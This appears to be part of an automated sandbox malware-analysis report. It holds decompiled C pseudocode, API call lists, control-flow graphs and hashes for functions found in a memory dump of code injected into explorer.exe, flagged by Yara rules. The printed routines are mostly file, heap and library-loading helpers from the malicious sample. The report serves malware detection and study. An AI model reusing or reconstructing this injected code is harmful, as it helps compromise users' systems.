                                                                                                                                                                                              • Opcode ID: 61bf9feea105d48ae5aebfccdfe233a02dab69b8faf2bf1a71d62ce2c4817070
                                                                                                                                                                                              • Instruction ID: 669f71e8179bd9784873d73b5b4cf31eb0a7573da67f4067bd0bf8ac5985b5ad
                                                                                                                                                                                              • Opcode Fuzzy Hash: 61bf9feea105d48ae5aebfccdfe233a02dab69b8faf2bf1a71d62ce2c4817070
                                                                                                                                                                                              • Instruction Fuzzy Hash: AD016D71E407049BD720AF71A849EDAB7E5EF89390F04092DE69687240EF746541CF90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 249 2f8f05c-2f8f07c call 2f89dd8 252 2f8f07e-2f8f084 GetModuleHandleA 249->252 253 2f8f086-2f8f08b LoadLibraryA 249->253 254 2f8f08d-2f8f08f 252->254 253->254 255 2f8f09e-2f8f0ac call 2f88b9c 254->255 256 2f8f091-2f8f096 call 2f8f011 254->256 259 2f8f09b-2f8f09c 256->259 259->255
                                                                                                                                                                                              C-Code - Quality: 47%
                                                                                                                                                                                              			E02F8F05C(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				char _t5;
                                                                                                                                                                                              				struct HINSTANCE__* _t7;
                                                                                                                                                                                              				void* _t10;
                                                                                                                                                                                              				void* _t12;
                                                                                                                                                                                              				void* _t22;
                                                                                                                                                                                              				void* _t25;
                                                                                                                                                                                              
                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                              				_t12 = __ecx;
                                                                                                                                                                                              				_t22 = __edx;
                                                                                                                                                                                              				_t5 = E02F89DD8(_a4);
                                                                                                                                                                                              				_t25 = 0;
                                                                                                                                                                                              				_v8 = _t5;
                                                                                                                                                                                              				_push(_t5);
                                                                                                                                                                                              				if(_a4 != 0xf43) {
                                                                                                                                                                                              					_t7 = LoadLibraryA(); // executed
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t7 = GetModuleHandleA();
                                                                                                                                                                                              				}
                                                                                                                                                                                              				if(_t7 != 0) {
                                                                                                                                                                                              					_t10 = E02F8F011(_t12, _t22, _t7); // executed
                                                                                                                                                                                              					_t25 = _t10;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				E02F88B9C( &_v8);
                                                                                                                                                                                              				return _t25;
                                                                                                                                                                                              			}











                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,?,?,?,02F9CA50,?,02F8652B,?), ref: 02F8F07E
                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(00000000,?,?,?,02F9CA50,?,02F8652B,?), ref: 02F8F08B
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: HandleLibraryLoadModule
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4133054770-0
                                                                                                                                                                                              • Opcode ID: 2eddaa3b128a40b1e274007289c865b4af56ee60a4203d361925b82a4c1a17eb
                                                                                                                                                                                              • Instruction ID: 851a33f336c166b6c1dbd409c55ac69c6159882ed2169d64bf2fb1d491951c81
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2eddaa3b128a40b1e274007289c865b4af56ee60a4203d361925b82a4c1a17eb
                                                                                                                                                                                              • Instruction Fuzzy Hash: B4F0AE32B101185FC7147B69EC4486AF3ED9F587D17504139F606D3550EAB09E40C690
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 261 2f8b3c7-2f8b3d6 262 2f8b3d8-2f8b3da 261->262 263 2f8b3df-2f8b3ea call 2f8b2fe 261->263 264 2f8b464-2f8b466 262->264 267 2f8b3ec-2f8b3fe 263->267 268 2f8b460 263->268 271 2f8b400-2f8b411 call 2f88bde 267->271 272 2f8b446-2f8b451 267->272 269 2f8b462-2f8b463 268->269 269->264 271->272 276 2f8b413-2f8b425 call 2f8b36c 271->276 272->268 277 2f8b453-2f8b45f call 2f88bf4 272->277 276->272 282 2f8b427-2f8b42a 276->282 277->268 282->272 283 2f8b42c-2f8b435 282->283 284 2f8b439-2f8b444 FindCloseChangeNotification 283->284 285 2f8b437 283->285 284->269 285->284
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E02F8B3C7(char _a4, intOrPtr* _a8) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				void* __ecx;
                                                                                                                                                                                              				intOrPtr _t14;
                                                                                                                                                                                              				intOrPtr _t15;
                                                                                                                                                                                              				intOrPtr _t17;
                                                                                                                                                                                              				intOrPtr _t22;
                                                                                                                                                                                              				void* _t24;
                                                                                                                                                                                              				intOrPtr* _t25;
                                                                                                                                                                                              				void* _t29;
                                                                                                                                                                                              				intOrPtr _t42;
                                                                                                                                                                                              				char _t44;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t32 = _a4;
                                                                                                                                                                                              				_t44 = 0;
                                                                                                                                                                                              				_v8 = 0;
                                                                                                                                                                                              				if(_a4 != 0) {
                                                                                                                                                                                              					_t29 = E02F8B2FE(_t32);
                                                                                                                                                                                              					if(_t29 == 0) {
                                                                                                                                                                                              						L12:
                                                                                                                                                                                              						_t14 = 0;
                                                                                                                                                                                              						L13:
                                                                                                                                                                                              						L14:
                                                                                                                                                                                              						return _t14;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t15 =  *0x2f9f818; // 0x508f6c8
                                                                                                                                                                                              					_t42 =  *((intOrPtr*)(_t15 + 0xf4))(_t29, 0);
                                                                                                                                                                                              					if(_t42 == 0) {
                                                                                                                                                                                              						L10:
                                                                                                                                                                                              						_t17 =  *0x2f9f818; // 0x508f6c8
                                                                                                                                                                                              						 *((intOrPtr*)(_t17 + 0x30))(_t29);
                                                                                                                                                                                              						if(_t44 != 0) {
                                                                                                                                                                                              							E02F88BF4( &_v8, 0);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						goto L12;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t4 = _t42 + 1; // 0x1
                                                                                                                                                                                              					_t22 = E02F88BDE(_t4); // executed
                                                                                                                                                                                              					_t44 = _t22;
                                                                                                                                                                                              					_v8 = _t44;
                                                                                                                                                                                              					if(_t44 == 0) {
                                                                                                                                                                                              						goto L10;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t24 = E02F8B36C(_t29, _t44, _t42,  &_a4); // executed
                                                                                                                                                                                              					if(_t24 == 0 || _a4 != _t42) {
                                                                                                                                                                                              						goto L10;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t25 = _a8;
                                                                                                                                                                                              						 *((char*)(_t42 + _t44)) = 0;
                                                                                                                                                                                              						if(_t25 != 0) {
                                                                                                                                                                                              							 *_t25 = _t42;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						FindCloseChangeNotification(_t29);
                                                                                                                                                                                              						_t14 = _t44;
                                                                                                                                                                                              						goto L13;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t14 = 0;
                                                                                                                                                                                              				goto L14;
                                                                                                                                                                                              			}















                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000,?,02F90BBE,00000000,00000000,02FAEFE0,02F9C9A0,00000000,02F9C9A0,00000000,00000000,?,00000294,00000000,0508FB48,00000400), ref: 02F8B43F
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ChangeCloseFindNotification
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2591292051-0
                                                                                                                                                                                              • Opcode ID: 21e77eb7435e57f56fe5b1f87b0bf0a3283438fb65c88220e0760c061050cef6
                                                                                                                                                                                              • Instruction ID: 46368e70d66d7c7fecda9562ac68b9309b349b722b33876ca95239640bcc38ae
                                                                                                                                                                                              • Opcode Fuzzy Hash: 21e77eb7435e57f56fe5b1f87b0bf0a3283438fb65c88220e0760c061050cef6
                                                                                                                                                                                              • Instruction Fuzzy Hash: CF11B672B0121AABD720AF69DD81F5AF7DDEF446D8F104165EA01C7254DB30D900C790
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 286 2f8b36c-2f8b385 287 2f8b3a4-2f8b3b2 ReadFile 286->287 288 2f8b3b4-2f8b3b8 287->288 289 2f8b387-2f8b38b 287->289 290 2f8b3b9-2f8b3be 289->290 291 2f8b38d-2f8b3a3 289->291 292 2f8b3c0 290->292 293 2f8b3c2-2f8b3c5 290->293 291->287 292->293 293->288
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,02F8B421,00000000,00000000,?,02F90BBE,00000000), ref: 02F8B3AA
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileRead
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                                                                              • Opcode ID: 4c21dad93b15076eb0a47025943a8dfea6d09abaf226f5501be31c8a4d429835
                                                                                                                                                                                              • Instruction ID: a058d4ca808567597b0b60716a686647b87360aa3a912d7a1a2131998565baa0
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c21dad93b15076eb0a47025943a8dfea6d09abaf226f5501be31c8a4d429835
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1601FF72A00219FFDB11DB95CC45BAAB7ACEB44699F104165A505D7100E270EA00D7A0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 294 2f8b31f-2f8b330 295 2f8b361-2f8b363 294->295 296 2f8b332-2f8b354 WriteFile 294->296 299 2f8b364-2f8b367 295->299 297 2f8b368-2f8b36a 296->297 298 2f8b356-2f8b35f 296->298 297->299 298->295 298->296
                                                                                                                                                                                              C-Code - Quality: 88%
                                                                                                                                                                                              			E02F8B31F(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                              				long _v8;
                                                                                                                                                                                              				void* _v12;
                                                                                                                                                                                              				void* _t13;
                                                                                                                                                                                              				void* _t21;
                                                                                                                                                                                              				void* _t23;
                                                                                                                                                                                              				void* _t26;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t23 = __ecx;
                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                              				_t26 = 0;
                                                                                                                                                                                              				_v12 = __ecx;
                                                                                                                                                                                              				_t21 = __edx;
                                                                                                                                                                                              				if(_a4 == 0) {
                                                                                                                                                                                              					L3:
                                                                                                                                                                                              					_t13 = 1;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                              						_v8 = _v8 & 0x00000000;
                                                                                                                                                                                              						if(WriteFile(_t23, _t26 + _t21, _a4 - _t26,  &_v8, 0) == 0) {
                                                                                                                                                                                              							break;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t26 = _t26 + _v8;
                                                                                                                                                                                              						_t23 = _v12;
                                                                                                                                                                                              						if(_t26 < _a4) {
                                                                                                                                                                                              							continue;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							goto L3;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						goto L4;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t13 = 0;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				L4:
                                                                                                                                                                                              				return _t13;
                                                                                                                                                                                              			}









                                                                                                                                                                                              APIs
                                                                                                                                                                                              • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,02F8956A,?), ref: 02F8B34C
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileWrite
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3934441357-0
                                                                                                                                                                                              • Opcode ID: fd24a82f73c1e390c8b81d72a77c7fea252f3e3d23ee44482da71dbfac9ac273
                                                                                                                                                                                              • Instruction ID: 095e6657627a966743e5fb180f5b3dfc04bad88b7dae3db674df313ea449ed6f
                                                                                                                                                                                              • Opcode Fuzzy Hash: fd24a82f73c1e390c8b81d72a77c7fea252f3e3d23ee44482da71dbfac9ac273
                                                                                                                                                                                              • Instruction Fuzzy Hash: F2F01D72A10218BFDB10DFA8D885FEBB7ACFB09688F104569A605E7100D770EE40DBA0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 300 2f8c879-2f8c892 302 2f8c894-2f8c895 300->302 303 2f8c896-2f8c8a3 call 2f8c862 300->303 306 2f8c8b9-2f8c8c4 FindCloseChangeNotification 303->306 307 2f8c8a5-2f8c8a8 303->307 310 2f8c8c6-2f8c8c8 306->310 308 2f8c8aa-2f8c8af 307->308 309 2f8c8b5-2f8c8b7 307->309 308->309 309->310
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E02F8C879(void* __ecx) {
                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                              				intOrPtr _t12;
                                                                                                                                                                                              				void* _t13;
                                                                                                                                                                                              				void* _t14;
                                                                                                                                                                                              				void* _t17;
                                                                                                                                                                                              				intOrPtr _t18;
                                                                                                                                                                                              				void* _t23;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                              				_t12 =  *0x2f9f820; // 0x508f8b8
                                                                                                                                                                                              				_t13 =  *((intOrPtr*)(_t12 + 0x70))(__ecx, 8,  &_v8, __ecx);
                                                                                                                                                                                              				if(_t13 != 0) {
                                                                                                                                                                                              					_t14 = E02F8C862(); // executed
                                                                                                                                                                                              					_t23 = _t14;
                                                                                                                                                                                              					if(_t23 != 0) {
                                                                                                                                                                                              						FindCloseChangeNotification(_v8);
                                                                                                                                                                                              						_t17 = _t23;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						if(_v8 != _t14) {
                                                                                                                                                                                              							_t18 =  *0x2f9f818; // 0x508f6c8
                                                                                                                                                                                              							 *((intOrPtr*)(_t18 + 0x30))(_v8);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t17 = 0;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					return _t17;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					return _t13;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}











                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 945cb1c61f28caa11f90bdd46ff9727c7f2b3e7c49854e32552e3e504f92c3f7
                                                                                                                                                                                              • Instruction ID: 400a3f0685f14f1b6f377a424a44758fa0dc5c58a4c0389308e151dff5069925
                                                                                                                                                                                              • Opcode Fuzzy Hash: 945cb1c61f28caa11f90bdd46ff9727c7f2b3e7c49854e32552e3e504f92c3f7
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1CF03A32E90108EBDB64EBA4D905E9DB3F8FB087C5F1146A6E601E7150DB30DA10DBA0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E02F88BF4(char _a4, intOrPtr _a8) {
                                                                                                                                                                                              				char _t3;
                                                                                                                                                                                              				intOrPtr _t4;
                                                                                                                                                                                              				void* _t9;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t3 = _a4;
                                                                                                                                                                                              				if(_t3 == 0) {
                                                                                                                                                                                              					return _t3;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t9 =  *_t3;
                                                                                                                                                                                              				if(_t9 != 0) {
                                                                                                                                                                                              					 *_t3 =  *_t3 & 0x00000000;
                                                                                                                                                                                              					_t4 = _a8;
                                                                                                                                                                                              					if(_t4 != 0xffffffff) {
                                                                                                                                                                                              						if(_t4 == 0xfffffffe) {
                                                                                                                                                                                              							_t4 = E02F8A456(_t9);
                                                                                                                                                                                              						}
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t4 = E02F8A43D(_t9);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					E02F88D6D(_t9, 0, _t4);
                                                                                                                                                                                              					_t3 = RtlFreeHeap( *0x2f9f900, 0, _t9); // executed
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t3;
                                                                                                                                                                                              			}







                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000000), ref: 02F88C3A
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                                                                              • Opcode ID: f1e9c8ecf3e713ea3228b06dd5d9c3a297db17c384abd1f103e911aff2cc7bb6
                                                                                                                                                                                              • Instruction ID: c71e80bd3583830a83646e02214a3125c9dcc07583548e828689d21f7e226252
                                                                                                                                                                                              • Opcode Fuzzy Hash: f1e9c8ecf3e713ea3228b06dd5d9c3a297db17c384abd1f103e911aff2cc7bb6
                                                                                                                                                                                              • Instruction Fuzzy Hash: B3F0A031E0352CAFCE213A24AC40BAAF7589F02BF4F944601FB25DB1E0C721A8404AE4
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E02F861C5() {
                                                                                                                                                                                              				char _v44;
                                                                                                                                                                                              				signed int _t8;
                                                                                                                                                                                              				intOrPtr _t15;
                                                                                                                                                                                              				intOrPtr _t16;
                                                                                                                                                                                              				void* _t23;
                                                                                                                                                                                              				void* _t32;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t8 =  *0x2f9f81c; // 0x2fb0000
                                                                                                                                                                                              				E02F9370B(_t8, _t23,  *((intOrPtr*)(_t8 + 0x224))); // executed
                                                                                                                                                                                              				E02F88BC9();
                                                                                                                                                                                              				E02F89591();
                                                                                                                                                                                              				E02F8D206();
                                                                                                                                                                                              				E02F86412(); // executed
                                                                                                                                                                                              				E02F8DD81(_t23);
                                                                                                                                                                                              				_t15 =  *0x2f9f81c; // 0x2fb0000
                                                                                                                                                                                              				 *((intOrPtr*)(_t15 + 0xa4)) = 2;
                                                                                                                                                                                              				_t16 =  *0x2f9f81c; // 0x2fb0000
                                                                                                                                                                                              				E02F8B557( &_v44,  *((intOrPtr*)(_t16 + 0xac)) + 7,  *((intOrPtr*)(_t16 + 0xac)) + 7);
                                                                                                                                                                                              				E02F8C164( &_v44);
                                                                                                                                                                                              				E02F88D6D( &_v44, 0, 0x27);
                                                                                                                                                                                              				E02F8611B( &_v44,  *((intOrPtr*)(_t16 + 0xac)) + 7,  *((intOrPtr*)(_t16 + 0xac)) + 7, _t32);
                                                                                                                                                                                              				ExitProcess(0);
                                                                                                                                                                                              			}










                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 02F88BC9: HeapCreate.KERNELBASE(00000000,00096000,00000000,02F86502), ref: 02F88BD2
                                                                                                                                                                                                • Part of subcall function 02F8DD81: GetVersionExA.KERNEL32(02FB0000,02FB0000,?,02F83B9C), ref: 02F8DDF4
                                                                                                                                                                                                • Part of subcall function 02F8DD81: GetCurrentProcessId.KERNEL32(?,02F83B9C), ref: 02F8DDFA
                                                                                                                                                                                                • Part of subcall function 02F8C164: FindCloseChangeNotification.KERNELBASE(00000000,?,00000001,02F842E1), ref: 02F8C197
                                                                                                                                                                                                • Part of subcall function 02F88D6D: memset.MSVCRT ref: 02F88D7F
                                                                                                                                                                                              • ExitProcess.KERNEL32(00000000,?,?,?,?), ref: 02F8623D
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Process$ChangeCloseCreateCurrentExitFindHeapNotificationVersionmemset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2933066355-0
                                                                                                                                                                                              • Opcode ID: e4f707b33b7e273fae16d5afe0433e7f9568a45061110b5d2ac80d8c9ed7eebd
                                                                                                                                                                                              • Instruction ID: cb283373f6835391a2ab83c9610cb5eff2b2cfc2e7e9b5e538af9c3bffc22815
                                                                                                                                                                                              • Opcode Fuzzy Hash: e4f707b33b7e273fae16d5afe0433e7f9568a45061110b5d2ac80d8c9ed7eebd
                                                                                                                                                                                              • Instruction Fuzzy Hash: B3F062B1B402088FD700F7B4DC8AF9DB7E6AF08780F054570D605DB251DA709415CF62
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E02F8B2BA(WCHAR* __ecx, long __edx) {
                                                                                                                                                                                              				intOrPtr _t6;
                                                                                                                                                                                              				long _t12;
                                                                                                                                                                                              				void* _t13;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t12 = __edx;
                                                                                                                                                                                              				_t13 = CreateFileW(__ecx, 0x40000000, 0, 0, __edx, 0x80, 0);
                                                                                                                                                                                              				if(_t13 != 0xffffffff) {
                                                                                                                                                                                              					if(_t12 == 4) {
                                                                                                                                                                                              						_t6 =  *0x2f9f818; // 0x508f6c8
                                                                                                                                                                                              						 *((intOrPtr*)(_t6 + 0x88))(_t13, 0, 0, 2);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					return _t13;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return 0;
                                                                                                                                                                                              			}







                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000000,00000000,02F89552), ref: 02F8B2D5
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                              • Opcode ID: a55e264e72bdce5aefe7c441fc7cabfe3df3c56e4430bd6a6bd994f636788839
                                                                                                                                                                                              • Instruction ID: bbb7d8ef750525ccbc858947be35ac96ee61bd54f183a79b3de365a93661a2e8
                                                                                                                                                                                              • Opcode Fuzzy Hash: a55e264e72bdce5aefe7c441fc7cabfe3df3c56e4430bd6a6bd994f636788839
                                                                                                                                                                                              • Instruction Fuzzy Hash: 06E092B2B401147EE3302669ACC8FABA29CD78A7FAF114770F725D7180C6108C5183B0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E02F8B467(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                              				signed int _t5;
                                                                                                                                                                                              				void* _t6;
                                                                                                                                                                                              				void* _t10;
                                                                                                                                                                                              				long _t15;
                                                                                                                                                                                              				void* _t17;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t15 = 2;
                                                                                                                                                                                              				_t5 = E02F8B2BA(_a4, _t15);
                                                                                                                                                                                              				_t17 = _t5;
                                                                                                                                                                                              				if(_t17 != 0) {
                                                                                                                                                                                              					_t6 = E02F8B31F(_t17, _a8, _a12); // executed
                                                                                                                                                                                              					if(_t6 != 0) {
                                                                                                                                                                                              						FindCloseChangeNotification(_t17);
                                                                                                                                                                                              						return 0;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t10 = 0xfffffffe;
                                                                                                                                                                                              					return _t10;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t5 | 0xffffffff;
                                                                                                                                                                                              			}









                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                              • Opcode ID: ca5ba43867d5d9ed2551382c768980e0b54cd2ca67dc9554a3e48c7174e223e0
                                                                                                                                                                                              • Instruction ID: 1e2cd61d6fe7f7ddf16df0891ea1ad9f010f3735a1a8d4361052c9d3b95cecfb
                                                                                                                                                                                              • Opcode Fuzzy Hash: ca5ba43867d5d9ed2551382c768980e0b54cd2ca67dc9554a3e48c7174e223e0
                                                                                                                                                                                              • Instruction Fuzzy Hash: 32E0D832B546256B8B217E68ED16E9EB749EF493F8B208711FB25CB2D0DF30D41186D0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 89%
                                                                                                                                                                                              			E02F8C164(void* __ecx) {
                                                                                                                                                                                              				intOrPtr _t4;
                                                                                                                                                                                              				void* _t5;
                                                                                                                                                                                              				intOrPtr _t6;
                                                                                                                                                                                              				void* _t12;
                                                                                                                                                                                              				void* _t13;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t4 =  *0x2f9f818; // 0x508f6c8
                                                                                                                                                                                              				_t13 = 0;
                                                                                                                                                                                              				_t5 =  *((intOrPtr*)(_t4 + 0xc8))(2, 0, __ecx);
                                                                                                                                                                                              				_t12 = _t5;
                                                                                                                                                                                              				if(_t12 != 0) {
                                                                                                                                                                                              					_t6 =  *0x2f9f818; // 0x508f6c8
                                                                                                                                                                                              					_push(_t12);
                                                                                                                                                                                              					if( *((intOrPtr*)(_t6 + 0xcc))() != 0) {
                                                                                                                                                                                              						_t13 = 1;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					FindCloseChangeNotification(_t12);
                                                                                                                                                                                              					return _t13;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t5;
                                                                                                                                                                                              			}









                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000,?,00000001,02F842E1), ref: 02F8C197
                                                                                                                                                                                              Memory Dump Source
